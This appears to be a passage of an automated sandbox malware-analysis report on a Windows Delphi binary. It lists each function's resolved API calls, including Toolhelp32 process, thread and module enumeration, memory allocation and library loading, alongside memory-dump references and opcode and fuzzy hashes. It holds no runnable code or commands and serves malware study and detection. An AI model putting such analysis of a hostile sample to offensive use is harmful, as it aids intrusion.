                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeString
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 26f6316bc8185af6cfec5d39073917b432a5016f15a4ed4c5e833358144013cc
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16A011A80002028A8A8A23E802A002B22222EE02003C8C0A823000A0008F2E8002A820
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02AF1A03,?,02AF1FC1), ref: 02AF15E2
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 711395fa7c811d94ca28617aec43e264576cede480061f043371cdad85c9f987
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 14c2a755871e137e47478a729c6466db6772660d45905d335431b23ec87322ca
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 711395fa7c811d94ca28617aec43e264576cede480061f043371cdad85c9f987
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 26F06DF0B813008FDB49CFB99A803017BF2E78A386F108579E709DB398EB7584058B00
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,02AF1FC1), ref: 02AF16A4
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a91cd82a48fd8371ef853946a257ae9d8d938be604048e957a6cbd985ba69548
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f15244838f5020060ee1b8ea5c90af59e9de8d4a3204ac9c696946eb0fdfc419
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a91cd82a48fd8371ef853946a257ae9d8d938be604048e957a6cbd985ba69548
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24F0B4B2B44B95ABD7509F9E9CC0B82BBA8FB10395F050139FA0C97340D770A8148B94
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,02AF1FE4), ref: 02AF1704
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3077a8a01b051dfb525956ca64dab790a37895eb5b2e086e5c79c771aa3b1cc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 75ab0df35fe6ab90c7ed284e31f5299c745597a7dba5c86e727e3c2e8479f22f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3077a8a01b051dfb525956ca64dab790a37895eb5b2e086e5c79c771aa3b1cc1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98E08675340301EFD7505BFD5D80712ABDCEB54654F144475F709DB241EA64E8148B60

                                                                                                                                                                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02B0AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02B0ADA3,?,?,02B0AE35,00000000,02B0AF11), ref: 02B0AB30
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02B0AB48
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02B0AB5A
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02B0AB6C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02B0AB7E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02B0AB90
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02B0ABA2
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02B0ABB4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02B0ABC6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02B0ABD8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02B0ABEA
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02B0ABFC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02B0AC0E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02B0AC20
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02B0AC32
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02B0AC44
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02B0AC56
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 667068680-597814768
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e60e764ba9131e37c80132d1855b19b820389c78a48ffe6e2e366e68287607d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5bc052e0578341c1f5aac27ed35ae4b59f14563bfba98ff3f976ae7cbdd899cd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e60e764ba9131e37c80132d1855b19b820389c78a48ffe6e2e366e68287607d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB312DF0A80350AFEF95EBB4D9C5A297BA9EB15B41B000DA1B611CF255EF7CA800DF11
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF5908 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5925
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02AF593C
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?), ref: 02AF596C
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF59D0
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A06
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A19
                                                                                                                                                                                                                                                                                                                                                                                                                          • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A2B
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000,02B1E790), ref: 02AF5A37
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14,02AF0000), ref: 02AF5A6B
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02AF6C14), ref: 02AF5A77
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02AF5A99
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 758e4dbe59ef641d696c1ef06df6dad322056f1a96f8139ca2f7e6abf9ce3df1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d6629623d6efc0439144b85a284e5b073c4a2578b38681123fd01b5e21108034
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 758e4dbe59ef641d696c1ef06df6dad322056f1a96f8139ca2f7e6abf9ce3df1
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB416D71D40219ABDB50EBE8CDC8ADEB7BDAF08340F4445A5B648E7241EB389B448F54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF5BD8 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02AF5BE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02AF5BF5
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02AF5BFB
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02AF5C26
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5C6D
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5C7D
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02AF5CA5
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02AF5CB5
                                                                                                                                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02AF5CDB
                                                                                                                                                                                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02AF5CEB
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1599918012-2375825460
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 46fb7769dd409c020892dade5b73c83e50e8f1491ba17335c146a65d9ded5de9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC318471E4026C6AEB65D7F48C85BDEB7ED9B04384F4401A1B709E6181EE789A858FA0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AF7FD4 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02AF7FF5
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 18699910f07a28bb27967493f0b6105890154c29bf99dc5217b5f8722542b989
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6da40a96276824e7acf15013fedfea5da185deed3b000be9258f4dab930fd872
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 89111EB5E00209AF9B44CF99C981DAFF7F9FFC8300B54C569A508E7254E671AA01CBA0
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFA7C4 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02AFA7E2
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000004.00000002.1558112391.0000000002AF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558083283.0000000002AF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002B77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000004.00000002.1558714357.0000000002C6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_2af0000_x.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a9d036c491ffb54ef84bc2618bb90d2c5211c1183ab0950c37aca46c0de9e70b
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFE0D87170421417D355A5E89D80EF7726D975C710F00427ABF09C7385EEE59E844BE4
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 02AFB78C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(?,02B1D106,00000000,02B1D11E), ref: 02AFB79A
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
